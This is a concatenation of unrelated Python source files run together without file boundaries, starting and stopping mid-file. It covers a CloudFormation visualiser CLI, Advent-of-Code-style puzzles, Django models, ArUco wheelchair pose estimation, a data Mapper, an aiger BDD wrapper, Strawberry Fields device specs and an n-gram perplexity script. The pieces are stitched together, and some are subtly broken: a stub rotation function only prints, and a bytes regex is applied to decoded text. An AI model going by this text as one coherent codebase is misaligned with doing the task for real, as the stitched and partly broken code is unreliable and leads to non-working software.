default=sys.stdout) @click.option('--unique-edges/--no-unique-edges', default=True) @click.option('--parameters/--no-parameters', default=True) @click.option('--outputs/--no-outputs', default=True) @click.option('--pseudo/--no-pseudo', default=True) @click.option('--globals/--no-globals', default=True) @click.option("--icons-path", type=click.Path(exists=True)) @click.version_option(message='Visualise AWS Cloudformation Templates, Version %(version)s') @click.pass_context def main(ctx, **kwargs): """ INPUT input filename [default: stdin] OUTPUT output filename [default: stdout] """ input_file = kwargs.pop('input') output_file = kwargs.pop('output') parameters_bool = kwargs.pop('parameters') outputs_bool = kwargs.pop('outputs') pseudo_bool = kwargs.pop('pseudo') globals_bool = kwargs.pop('globals') unique_edges_bool = kwargs.pop('unique_edges') icons_path = kwargs.pop('icons_path') if input_file.name == "" and sys.stdin.isatty(): click.echo(ctx.get_help()) ctx.exit() try: cfn_parser_obj = cfn_parser( parameters_bool, outputs_bool, pseudo_bool, globals_bool ) graph = cfn_parser_obj.read_input(input_file) except Exception as e: raise click.ClickException("{}".format(e)) try: write_output(output_file, graph, unique_edges_bool, icons_path) except Exception as e: raise click.ClickException("{}".format(e)) if __name__ == '__main__': main() 0 area_ids = { 'Central': 1, 'Rampart': 2, 'Southwest': 3, 'Hollenbeck': 4, 'Harbor': 5, 'Hollywood': 6, 'Wilshire': 7, 'West LA': 8, 'Van Nuys': 9, 'West Valley': 10, 'Northeast': 11, '77th Street': 12, 'Newton': 13, 'Pacific': 14, 'N Hollywood': 15, 'Foothill': 16, 'Devonshire': 17, 'Southeast': 18, 'Mission': 19, 'Olympic': 20, 'Topanga': 21, } swcide/algorithm input = [3, 5, 2, 3, 4, 6, 1, 2, 4] def find_max_num(array): a = max(array) for i in array: for j in array: ''' i의 값이 j보다 작다면 break j의 값이 더 크다면 계속해 반복. for else. if 문 안의 값이 break가 아닐 시 else를 출력함. ''' if i < j: print(i, ": i", j, ":j") ''' 3 : i 5 :j 5 : i 6 :j 2 : i 3 :j 3 : i 5 :j 4 : i 5 :j ''' break else: print(i, "else") return i result = find_max_num(input) print(result) with open('input.txt') as file: code = [line.strip() for line in file] open_tags = ['(', '[', '{', '<'] close_tags = [')', ']', '}', '>'] incomplete_lines = [] def find_incomplete_lines(): for line in code: modified_line = line finished = False while not finished: end_or_modified = False for i in range(len(modified_line)): if i == len(modified_line) - 1: # missing character(s) incomplete_lines.append(line) end_or_modified = True finished = True break if modified_line[i] in open_tags and modified_line[i + 1] in close_tags: for t in range(4): if modified_line[i] == open_tags[t] and modified_line[i + 1] == close_tags[t]: modified_line = modified_line[:i] + modified_line[i + 2:] end_or_modified = True break if t == 3: # illegal character end_or_modified = True finished = True break if end_or_modified: break find_incomplete_lines() unclosed_line_tags = [] def remove_legal_pairs(): for line in incomplete_lines: finished = False while not finished: for i in range(len(line)): end_or_modified = False if i != len(line) - 1: if line[i] in open_tags and line[i + 1] in close_tags: for t in range(4): if line[i] == open_tags[t] and line[i + 1] == close_tags[t]: line = line[:i] + line[i + 2:] end_or_modified = True break else: # end of line unclosed_line_tags.append(line) finished = True end_or_modified = True if end_or_modified: break remove_legal_pairs() scores = [] def calc_scores(): for line in unclosed_line_tags: score = 0 for opening_tag in reversed(list(line)): for t in range(4): if open_tags[t] == opening_tag: score *= 5 score += (t + 1) break scores.append(score) calc_scores() scores.sort() print(scores[int((len(scores)/2))]) ''' local_functions.py module repository of functions used throught the application ''' from datetime import date, timedelta def date_path_concat(y, m, d): '''concat date tuple to 'y_m_d' format ''' return str(y)+'_'+str(m).zfill(2)+'_'+str(d).zfill(2) def date_to_int(y, m, d): '''return date tuple from string tuple ''' return int(str(y)+str(m).zfill(2)+str(d).zfill(2)) def date_add_day(y, m, d, dif): '''return new date tuple from old date tuple + dif ''' d = date(y, m, d) n = d + timedelta(days=dif) return (n.year, n.month, n.day) akashdraut/btre_project0 from django.contrib import admin from .models import Realtor class RealtorAdmin(admin.ModelAdmin): """ To show the required fields on admin panel """ list_display = ('id', 'name', 'email') # To display field names list_display_links = ('id', 'name') # To make clickable links search_fields = ('name',) # Searchable fields list_per_page = 25 # Fot listing per page admin.site.register(Realtor, RealtorAdmin) import numpy as np import cv2 import cv2.aruco as aruco import pyrealsense2 as rs import copy import threading from datetime import datetime import sys, time from threading import Timer import math #from numpy import cross, eye, dot from scipy.linalg import expm, norm diff_w = np.asarray([0.01,-0.085,-0.1]) def M(axis, theta): return expm(np.cross(np.eye(3), axis/norm(axis)*theta)) class Wheelchair(): def __init__(self): #To do: change num1, num2 to a list of num self.aruco_num1 = 0 self.aruco_num2 = 12 self.in_camera = False self.num_xyz = {'num1': None , 'num2': None } def wheelchair_dec(self,ids,corners,depth_img): num = int(len(ids)) for id in range(num): if ids[id] == self.aruco_num1: self.num_xyz['num1'] = get_xyz(corners[id], depth_img) self.in_camera = True if ids[id] == self.aruco_num2: self.num_xyz['num2'] = get_xyz(corners[id], depth_img) #self.in_camera = True #if self.num_xyz['num1'] != None and self.num_xyz['num2'] != None : #print(self.num_xyz['num1'],self.num_xyz['num2']) def unit_vector(vector): """ Returns the unit vector of the vector.""" return vector / np.linalg.norm(vector) def angle_between(v1, v2): """Finds angle between two vectors""" v1_u = unit_vector(v1) v2_u = unit_vector(v2) return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0)) def rotation_matrix(axis, theta): """ Return the rotation matrix associated with counterclockwise rotation about the given axis by theta radians. """ print("rotation_matrix compute",axis,theta) class obj(): def __init__(self,num1,num2,num3): self.aruco_num1 = num1 self.aruco_num2 = num2 self.aruco_num3 = num3 self.in_camera = False self.xyz1 = None self.xyz2 = None self.xyz3 = None def obj_dec(self,ids,corners,depth_img): for id in range(len(ids)): if ids[id] == self.aruco_num1: self.xyz1 = get_xyz(corners[id], depth_img) self.in_camera = True #print("obj",self.aruco_num,"xyz=",self.xyz) if ids[id] == self.aruco_num2: self.xyz2 = get_xyz(corners[id], depth_img) if ids[id] == self.aruco_num3: self.xyz3 = get_xyz(corners[id], depth_img) #self.in_camera = True #print("obj",self.aruco_num,"xyz=",self.xyz) def compute_obj2wheelchair_base(self,wheelchair): w_Q1 = np.asarray(wheelchair.num_xyz['num1']) w_Q2 = np.asarray(wheelchair.num_xyz['num2']) o_Q1 = np.asarray(self.xyz1) o_Q2 = np.asarray(self.xyz2) #print(w_Q1,"\n",w_Q2,"\n",o_Q1,"\n",o_Q2) axis_x_c = unit_vector( w_Q2 - w_Q1 ) axis_z_c = unit_vector( o_Q2 - o_Q1 ) axis_y_c = np.cross(axis_x_c, axis_z_c) #print("axis",axis_x_c, axis_y_c, axis_z_c) RT = np.array([axis_x_c, axis_y_c, axis_z_c]) RT = np.asmatrix(RT) RT_i = np.linalg.inv(RT) o2w = o_Q2 - w_Q2 o2w = o2w.dot(RT_i) #print(RT) #print(o2w) o_Q3 = np.asarray(self.xyz3) axis_x_o = unit_vector( o_Q2 - o_Q3 ) axis_z_o = unit_vector( o_Q2 - o_Q1 ) axis_y_o = np.cross(axis_x_o, axis_z_o) RT_o = np.array([axis_x_o, axis_y_o, axis_z_o]) RT_o = np.asmatrix(RT_o) RT_o_i = np.linalg.inv(RT_o) o_axis = o_Q3.dot(RT_o_i) #print(o_axis) #print("MOVE",o_axis[0,1]) o_axis[0,1] = o_axis[0,1] + 0.2 obj_c = o_axis.dot(RT_o) obj_w = obj_c - w_Q2 obj2w = obj_w.dot(RT_i) + diff_w print(obj2w) return obj2w # print(self.xyz,wheelchair.num_xyz['num2']) # dis_obj2wheelchairnum2 =np.asarray(self.xyz - wheelchair.num_xyz['num2']) # axis_y_wheelchair_camera =np.asarray(wheelchair.num_xyz['num2'] - wheelchair.num_xyz['num1']) # print("dis_obj2wheelchairnum2 = ",dis_obj2wheelchairnum2) # print("axis_wheelchair_camera = ",axis_y_wheelchair_camera) # A = np.asarray([1, 0, 0]) # B = axis_y_wheelchair_camera # print("A = ",A,"B = ",B) # axis = np.cross(A,B) # theta = angle_between(A,B) # print(theta) # rotation_matrix(axis, theta) # M0 = M(axis, theta) # print("obj2wheelchair",dis_obj2wheelchairnum2.dot(M0)) #wheelchair2obj = np.dot(Rv, dis_obj2wheelchairnum2) #print(wheelchair2obj) def get_xyz(conner,depth_img): camera_cx = 340.745 camera_cy = 245.132 camera_fx = 615.376 camera_fy = 614.775 conner_p = conner[0] n,m = int(np.mean(conner_p[:,0])),int(np.mean(conner_p[:,1])) z = depth_img[m,n]/1000.0 x = (n - camera_cx) * z / camera_fx y = (m - camera_cy) * z / camera_fy return np.array([x,y,z]) def aruco_init(): global pipe, find_wheel_chair cap = cv2.VideoCapture(0) pipe = rs.pipeline() config = rs.config() config.enable_stream(rs.stream.color, 640, 480, rs.format.rgb8, 30) config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30) profile = pipe.start(config) find_wheel_chair = 0 def process_data(ids,rotation_mat): global send_data for i in range(3): for j in range(3): index = 10+ids*9+i*3+j #send_data.double6dArr[index] = rotation_mat[i,j] #send_data.double6dArr[10]=rotation_mat(0, 1) def aruco_fun_compute(): global pipe axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3) frames = pipe.wait_for_frames() align_to = rs.stream.color align = rs.align(align_to) aligned_frames = align.process(frames) depth_frame = aligned_frames.get_depth_frame() color_frame = aligned_frames.get_color_frame() color_img = np.array(color_frame.get_data()) color_img_temp = copy.deepcopy(color_img) depth_img = np.array(depth_frame.get_data()) frame = color_img_temp gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250) parameters = aruco.DetectorParameters_create() corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters) wheelchair = Wheelchair() obj1 = obj(5,6,11) if ids is not None and len(ids) > 0: wheelchair.wheelchair_dec(ids,corners,depth_img) obj1.obj_dec(ids,corners,depth_img) if wheelchair.in_camera and obj1.in_camera: print("let us see the distance in camera") pipe.stop() return obj1.compute_obj2wheelchair_base(wheelchair) pipe.stop() return [0.0,0.0,0.0] def aruco_fun(): global pipe axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3) frames = pipe.wait_for_frames() align_to = rs.stream.color align = rs.align(align_to) aligned_frames = align.process(frames) depth_frame = aligned_frames.get_depth_frame() color_frame = aligned_frames.get_color_frame() color_img = np.array(color_frame.get_data()) color_img_temp = copy.deepcopy(color_img) depth_img = np.array(depth_frame.get_data()) frame = color_img_temp gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250) parameters = aruco.DetectorParameters_create() corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters) wheelchair = Wheelchair() obj1 = obj(5,6,11) if ids is not None and len(ids) > 0: wheelchair.wheelchair_dec(ids,corners,depth_img) obj1.obj_dec(ids,corners,depth_img) # global wheel_chair_translation_vectors, find_wheel_chair # num = int(len(ids)) # for id_obj in range(num): # if ids[id_obj] == 6: # find_wheel_chair = 1 # wheel_chair_translation_vectors = get_xyz(corners[id_obj], depth_img) # elif ids[id_obj]!=6: # if find_wheel_chair == 0: # continue # obj_translation_vectors = get_xyz(corners[id_obj], depth_img) # p = obj_translation_vectors - wheel_chair_translation_vectors # print(ids[id_obj]," ","postion vetor is",p) # #process_data(ids[id_obj],p) if wheelchair.in_camera and obj1.in_camera: print("let us see the distance in camera") obj1.compute_obj2wheelchair_base(wheelchair) gray = aruco.drawDetectedMarkers(gray, corners) cv2.imshow('frame',gray) if cv2.waitKey(1) & 0xFF == ord('q'): cv2.destroyAllWindows() #break def get_obj2w(): aruco_init() obj2w = aruco_fun_compute() return obj2w #if __name__ =='__main__': #main()import inspect def add_line_macro(bsv_code, file_name = None, line_number = None): """ Appends line macro to the provided bsv_code to get accurate BSC error messages. If file name or line number are not provided, this function assumes the text of bsv_code was written in this function call without line breaks between the parenthesis of the function call and bsv_code string. When using this function, if you get a compilation error in BSC, the file name and line number will point to the file name and line number in the python script containing Good example: >> bsv_code = add_line_macro(''' module mkTest(Empty); Reg#(Bit#(32)) x <- mkReg(0); endmodule ''') Bad example: >> bsv_code = 'function Bool inv(Bool x) = !x;' >> bsv_code = add_line_macro(bsv_code) """ frame = inspect.stack()[1][0] try: if not file_name: file_name = inspect.getframeinfo(frame).filename if not line_number: line_number = inspect.getframeinfo(frame).lineno - bsv_code.count('\n') finally: del frame return ('`line %d "%s" 0\n' % (line_number, file_name)) + bsv_code from finq import FINQ def test_flat_map_list_of_lists_to_list(): a = [[1, 2, 5], [7, 12], [15, 22, 26]] expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_list_of_tuples_to_list(): a = [(1, 2, 5), (7, 12), (15, 22, 26)] expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_tuple_of_list_to_list(): a = ([1, 2, 5], [7, 12], [15, 22, 26]) expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_set_of_list_to_list(): a = {(1, 2, 5), (7, 12), (15, 22, 26)} expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected # the order of imports is important here. "view" uses "main" # so "main" must be imported before "views". from ..blueprint import main # noqa: F401 from . import views # noqa: F401 #!/usr/bin/env python3 def get_input() -> list: with open('./input', 'r') as f: return [v.strip() for v in f.readlines()] lines = get_input() items = [dict()] for line in lines: if line == '': items.append(dict()) else: for tok in line.split(' '): k, v = tok.split(':') items[-1].update({k: v}) valid_count = 0 for it in items: valid = True for required_value in ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']: if not required_value in it: valid = False break if valid: valid_count += 1 print(valid_count) kvderevyanko/price #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2015-2019 <> """Library and util for uploading files to NodeMCU version 0.9.4 and later""" from .version import __version__ # noqa: F401 from .uploader import Uploader # noqa: F401 jimforit/lagou from django.db import models from db.base_model import BaseModel from django.contrib.auth.models import AbstractUser # Create your models here. class Role(BaseModel): role_choices = ( ('user', '求职者'), ('recruiter', '招聘人') ) id = models.AutoField('角色ID',primary_key=True) name = models.CharField('角色名',choices=role_choices,max_length=10) class Meta: verbose_name = '角色' verbose_name_plural = verbose_name def __str__(self): return self.name class User(AbstractUser,BaseModel): gender_choices = ( ('male', '男'), ('female', '女') ) id = models.AutoField('用户ID',primary_key=True) nick_name = models.CharField('昵称', max_length=50, default='') password = models.CharField('密码',max_length=20) gender = models.CharField('性别', max_length=10, choices=gender_choices, default='female') email = models.EmailField('电邮地址', max_length=64, default='') role = models.ForeignKey(Role, verbose_name='角色', on_delete=models.CASCADE,default=1) mobile = models.CharField('手机号', max_length=11, null=True, blank=True) image = models.ImageField(upload_to='image/%Y%m', default='/static/images/CgotOVsDfHCAC9pmAAGCQkZqi4Y202.png', max_length=100) class Meta: verbose_name = '用户信息' verbose_name_plural = verbose_name def __str__(self): return self.username import serial import pynmea2 def parseGPS(s): if s.find('GGA') > -1: msg = pynmea2.parse(s) print("Timestamp: %s -- Lat: %s %s -- Lon: %s %s -- Altitude: %s %s" % ( msg.timestamp, msg.lat, msg.lat_dir, msg.lon, msg.lon_dir, msg.altitude, msg.altitude_units)) serialPort = serial.Serial("/dev/ttyUSB0", 9600, timeout=0.5) while True: s = serialPort.readline() # print(s) # print(type(s.decode())) # print(s.find(b'GGA')) s = s.decode() parseGPS(s) JeffKwasha/hachit """ Mapper 'maps' data into a new heirarchy: A mapper from: { 'REMAP': {'out' : ('foo', 'bar', 2)} with input: {'foo' : { 'bar' : ('baz', 5, 'buzz') } } will output: {'out' : 'buzz' } More formally: Mapper is built from a dictionary; mapper = Mapper( {...} ) Mapper is called on some data; newData = mapper(data) Mapper REMAPs its input, evaluates its fields, and DISCARDs parts of the result. REMAP - search the input for values and assign them to the REMAP's fieldname: { K:REMAP(V, INPUT) for K,V in REMAP.items() } REMAP() does the following: if 'V' is a string or int: return INPUT[FIELD_NAME] if 'V' is a tuple, drill down: return INPUT[FIELD_NAME[0]][FIELD_NAME[1]]... if 'V' is a list, return [ REMAP(i, INPUT) for i in V] if 'V' is a dict, recurse return {k:REMAP(v, INPUT) for k,v in V.items()} if 'V' is a function, return V(INPUT) 'fields' - anything in mapper's top level other than 'REMAP', 'DISCARD', 'INDEX', or 'TYPES' is a field Fields are simply evaluated and assigned, and they 'update' the value built by REMAP DISCARD - search the value and discard anything found. (performed last) typically a list of keys or indexes to delete, Unnecessary if REMAP is used (Why REMAP only to later discard) """ # a class to execute mappings over data from copy import deepcopy import logging from utils import eval_field #TODO lambda data: {k,v for k,v in data if len(k) > 5} #TODO lambda data: ((a,b) for a,b in data if 'foo' in a) logger = logging.getLogger(__name__) from pprint import pformat class Mapper: """ Mapper is the universal converter between data structures. NOTE! Mapper doesn't make clean copies. It will wreck your input and the input and output will be linked. Mapper( { 'REMAP' : {...}, 'DISCARD' : [...], 'etc' : 'foo' } ) works like a dictionary: mapper_instance['out_field'] = 'foo string' works like a function: out_data = mapper_instance(data_in) chops up and rebuilds input data based on 'REMAP', 'DISCARD', 'dictionary fields'... REMAP : { 'key': 'value' } navigates data using value and returns {'key': data['value']} You can drill down into dictionaries lists and tuples: { 'key': ('top_dict', 'sub_dict', 3) } You can use a function to inspect the data and return a value { 'key' : lambda data: ','.join( data['list'] ) } DISCARD: throws away outputs... TODO: Mapper config should be able to refer to itself: 'outfield' = lambda v: self.config['remap']['bar'] TODO: output elastic mapping structures based on config... ? Mapper constant values override values from REMAP Mapper DISCARD is performed last (overriding everything) Mapper constant values can be iterated like a dict. Mapper constant values can be lookedup/assigned like a dict Mapper constant values can be a function to execute on the data, which means the function can alter the data at will. """ __slots__ = ('remap', 'discard', 'index', 'types', 'fields', 'invalid') def __init__(self, dic, data=None): logger.debug("Initializing {} from {}".format(self.__class__.__name__, dic)) dic_t = type(dic) if dic_t is Mapper: raise Exception("Don't initialize a mapper with a mapper") if dic_t is dict: self.remap = dic.pop('REMAP', None) # fields you want to rename or rearrange self.discard = dic.pop('DISCARD', None)# fields you don't want self.index = dic.pop('INDEX', None) # index is reserved for future elasticsearch magicality self.types = dic.pop('TYPES', None) # types is reserved for future elasticsearch magicality self.invalid = dic.pop('INVALID', None) # invalid defines REMAP's default invalid value. self.fields = dic # fields are simply assigned values ie: return value(data) if callable(value) else value. elif dic_t in (str, int, float): self.fields = dic if data: self.fields = self(data) @staticmethod def _discards(discards, data): if not discards: return #logger.error('del {} on {}'.format(pformat(discards,), pformat(data))) d_t = type(discards) if d_t in (int, str): try: del data[discards] except IndexError: pass except KeyError: pass except TypeError: pass return elif d_t is tuple: # Drill down if len(discards) > 1: Mapper._discards(discards[1:], data[discards[0]]) else: Mapper._discards(discards[0], data) return # if discards is not a tuple, but is iterable, just delete the whole list (or dictionary keys or ...) for li in discards: Mapper._discards(li, data) return def __call__(self, data): """ frankinstate output from data-parts. this makes Mapper 'callable' so a Mapper is a valid field value in defining a Mapper. Not sure how you could, but Don't make cycles. """ logger.debug("mapper: {} data: {}".format(self.remap, data)) from utils import search # remap the input data (effectively deleting anything not listed) if self.remap: rv = search(self.remap, data, invalid=self.invalid) elif self.discard and isinstance(data, dict): rv = deepcopy(data) else: rv = {} # add the static fields if self.fields: eval_field(rv, self.fields, rv or data) # delete any discards self._discards(self.discard, rv) return rv def __getitem__(self, key): return self.fields.__getitem__(key) def __setitem__(self, key, val): return self.fields.__setitem__(key, val) def __iter__(self): return self.fields.__iter__() def __next__(self): return self.fields.__next__() def _test(): data= { 'DISCARD' : 'hash', 'REMAP': { 'hash' : lambda v: v[0], 'name' : lambda v: v[1], 'date.created' : lambda v: v[2], 'comment' : lambda v: v[3], }, 'key': 'value', } try: m = Mapper(data) return m(['a','b','c','d']) == {'name':'b', 'date.created':'c', 'comment':'d', 'key':'value'} except: return False 0 from lib.dataset.imdb import IMDB from lib.dataset.pascal_voc import PascalVOC from lib.dataset.nuclei_data import NucleiDataset from lib.dataset.pascal_voc_segmentation import PascalVOC_Segmentation from lib.dataset.cityscape_segmentation import CityScape_Segmentation from lib.dataset.coco import coco redax/predicates/aiger.py1-10 import funcy as fn import aiger from aiger_analysis.bdd import from_bdd, to_bdd try: from dd.cudd import BDD except ImportError: try: from dd.autoref import BDD except ImportError: raise ImportError( "Cannot import dd.cudd or dd.autoref." + "Reinstall with BDD support." ) aa = None bddmgr = BDD() to_bdd = fn.partial(to_bdd, manager=bddmgr) from_bdd = fn.partial(from_bdd, manager=bddmgr) class AAG(): """ Wrapper around py-aiger's BoolExpr class. Used to support an interface that's analogous to dd. """ def __init__(self, aag): self.aag = aag @property def support(self): return self.aag.inputs def __invert__(self): return AAG(~self.aag) def __or__(self, other): return AAG(self.aag | other.aag) def __and__(self, other): return AAG(self.aag & other.aag) def __eq__(self, other): # return aa.is_equal(self.aag, other.aag) # sat-based interface ### BDD based interface for now bdd, _, vartable = to_bdd(self.aag) bddmgr.declare(*vartable.inv.values()) bdd = bddmgr.let(vartable.inv, bdd) return to_bdd(self.aag)[0] == to_bdd(other.aag)[0] def __iand__(self, other): return AAG(self.aag & other.aag) def __ior__(self, other): return AAG(self.aag | other.aag) class aigerwrapper(object): """ Wrapper around py-aiger. Mimics the interface of dd. """ def __init__(self): pass def declare(self, name: str): pass def var(self, name: str): return AAG(aiger.atom(name)) def exist(self, vars, pred): # return AAG(aa.eliminate(aag, vars)) aagbdd, _, vartable = to_bdd(pred.aag) bddmgr.declare(*vartable.inv.values()) aagbdd = bddmgr.let(vartable.inv, aagbdd) return AAG(from_bdd( bddmgr.exist(vars, aagbdd) )) def forall(self, vars, pred): # return AAG(~aa.eliminate(~aag, vars)) aagbdd, _, vartable = to_bdd(pred.aag) bddmgr.declare(*vartable.inv.values()) aagbdd = bddmgr.let(vartable.inv, aagbdd) return AAG(from_bdd( bddmgr.forall(vars, aagbdd))) @property def true(self): return AAG(aiger.atom(True)) @property def false(self): return AAG(aiger.atom(False)) def count(self, aag, bits): raise NotImplementedError def pick_iter(self, aag): raise NotImplementedError """ Copyright (C) 2020 () This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import asyncio import datetime from unittest import TestCase from mock import patch import blmcontrol.animations import blmcontrol.blmcontrol import blmcontrol.earth_data.earth_data class TestAnimationOrder(TestCase): @patch('blmcontrol.earth_data.earth_data.current_time') def test_animation_start(self, current_time_mock): """ Check if animation starts on time """ current_time_mock.return_value = datetime.datetime.now().replace(hour=12) self.assertTrue(blmcontrol.earth_data.earth_data.lights_out()) current_time_mock.return_value = datetime.datetime.now().replace(hour=8) self.assertFalse(blmcontrol.earth_data.earth_data.lights_out(hard_off='10:30')) @patch('blmcontrol.earth_data.earth_data.current_time') def test_animation_select(self, current_time_mock): """ Check if animation starts correct one """ blmcontrol.animations.TIMES = 1 current_time_mock.return_value = datetime.datetime.now().replace(hour=10, minute=0) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == [1]) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == []) current_time_mock.return_value = datetime.datetime.now().replace(hour=10, minute=15) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == [2]) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == []) current_time_mock.return_value = datetime.datetime.now().replace(hour=12) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertEqual(blmcontrol.blmcontrol.CURRENT_DISPLAY, 0) sylviemonet/strawberryfields # Copyright 2020 Xanadu Quantum Technologies Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This module contains a class that represents the specifications of a device available via the API. """ from collections.abc import Sequence import re import blackbird from blackbird.error import BlackbirdSyntaxError import strawberryfields as sf from strawberryfields.compilers import Ranges from strawberryfields.tdm.tdmprogram import TDMProgram class DeviceSpec: """The specifications for a specific hardware device. Args: target (str): name of the target hardware device spec (dict): dictionary representing the raw device specification. This dictionary should contain the following key-value pairs: - layout (str): string containing the Blackbird circuit layout - modes (int): number of modes supported by the target - compiler (list): list of supported compilers - gate_parameters (dict): parameters for the circuit gates connection (strawberryfields.api.Connection): connection over which the job is managed """ def __init__(self, target, spec, connection): self._target = target self._connection = connection self._spec = spec @property def target(self): """str: The name of the target hardware device.""" return self._target @property def layout(self): """str: Returns a string containing the Blackbird circuit layout.""" return self._spec["layout"] @property def modes(self): """int: Number of modes supported by the device.""" return self._spec["modes"] @property def compiler(self): """list[str]: A list of strings corresponding to Strawberry Fields compilers supported by the hardware device.""" return self._spec["compiler"] @property def default_compiler(self): """sf.compilers.Compiler: Specified default compiler""" if self.compiler: return self.compiler[0] # For now, use Xunitary compiler by default for devices # if the default compiler is not specified. return "Xunitary" @property def gate_parameters(self): """dict[str, strawberryfields.compilers.Ranges]: A dictionary of gate parameters and allowed ranges. The parameter names correspond to those present in the Blackbird circuit layout. **Example** >>> spec.gate_parameters {'squeezing_amplitude_0': x=0, x=1, 'phase_0': x=0, 0≤x≤6.283185307179586} """ gate_parameters = {} for gate_name, param_ranges in self._spec["gate_parameters"].items(): # convert gate parameter allowed ranges to Range objects range_list = [[i] if not isinstance(i, Sequence) else i for i in param_ranges] gate_parameters[gate_name] = Ranges(*range_list) return gate_parameters def layout_is_formatted(self): """bool: Whether the device layout is formatted or not.""" p = re.compile(r"{{\w*}}") return not bool(p.search(self.layout)) def fill_template(self, program): """Fill template with parameter values from a program""" if self.layout_is_formatted(): return if isinstance(program, TDMProgram): self._spec["layout"] = self._spec["layout"].format( target=self.target, tm=program.timebins ) else: # TODO: update when `self._spec["layout"]` is returned as an unformatted string raise NotImplementedError("Formatting not required or supported for non-TDM programs.") def validate_parameters(self, **parameters): """Validate gate parameters against the device spec. Gate parameters should be passed as keyword arguments, with names corresponding to those present in the Blackbird circuit layout. """ # check that all provided parameters are valid for p, v in parameters.items(): if p in self.gate_parameters and v not in self.gate_parameters[p]: # parameter is present in the device specifications # but the user has provided an invalid value raise ValueError( f"{p} has invalid value {v}. Only {self.gate_parameters[p]} allowed." ) if p not in self.gate_parameters: raise ValueError(f"Parameter {p} not a valid parameter for this device") def create_program(self, **parameters): """Create a Strawberry Fields program matching the low-level layout of the device. Gate arguments should be passed as keyword arguments, with names correspond to those present in the Blackbird circuit layout. Parameters not present will be assumed to have a value of 0. **Example** Device specifications can be retrieved from the API by using the :class:`~.Connection` class: >>> spec.create_program(squeezing_amplitude_0=0.43) Keyword Args: Supported parameter values for the specific device Returns: strawberryfields.program.Program: program compiled to the device """ try: bb = blackbird.loads(self.layout) except BlackbirdSyntaxError as e: raise BlackbirdSyntaxError("Layout is not formatted correctly.") from e self.validate_parameters(**parameters) # determine parameter value if not provided extra_params = set(self.gate_parameters) - set(parameters) for p in extra_params: # Set parameter value as the first allowed # value in the gate parameters dictionary. parameters[p] = self.gate_parameters[p].ranges[0].x # evaluate the blackbird template bb = bb(**parameters) prog = sf.io.to_program(bb) prog._compile_info = (self, self.default_compiler) return prog def refresh(self): """Refreshes the device specifications""" self._spec = self._connection._get_device_dict(self.target) sonvt1710/manga-py #!/usr/bin/python3 # -*- coding: utf-8 -*- import unittest from os import path from manga_py import fs from tests import * root_path = path.join(path.dirname(path.realpath(__file__)), 'tests') if __name__ == '__main__': fs.make_dirs(root_path + '/temp') unittest.main() #!/usr/bin/python3 # -*- coding: utf-8 -*- # # Routines for language model estimation and perplexity computation. # # Author: # http://users.marjaniemi.com/seppo/ import sys import re import tempfile import subprocess def read_word_segmentations(input_file): wsegs = dict() for line in input_file: line = line.strip() if line.startswith('#'): continue line = re.sub('\d*', '', line) parts = line.split(r'+') if len(parts) < 2: parts = line.split(' ') parts = [re.sub(' ', '', x) for x in parts] wrd = '' for part in parts: wrd += part wsegs[wrd] = parts return wsegs def word_perplexity(train_text, devel_text, vocabulary=None): lm_file = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") command = [ 'ngram-count', '-order', '2', '-wbdiscount1', '-wbdiscount2', '-interpolate1', '-interpolate2', '-text', train_text, '-lm', lm_file.name ] if vocabulary is not None: command.extend(['-unk', '-vocab', vocabulary]) subprocess.check_call(command) command = [ 'ngram', '-order', '2', '-lm', lm_file.name, '-ppl', devel_text] if vocabulary is not None: command.extend(['-unk', '-vocab', vocabulary]) output = subprocess.check_output(command).decode('utf-8').splitlines() matches = re.search(b'(\d+) OOVs', output[0]) if matches: num_oovs = int(matches.group(1)) else: sys.stderr.write("Unable to parse OOVs from:\n") sys.stderr.write(output[0]) sys.stderr.write("\n") sys.exit(1) matches = re.search(b'ppl= ?(\d+(.\d+)?)', output[1]) if matches: perplexity = float(matches.group(1)) else: 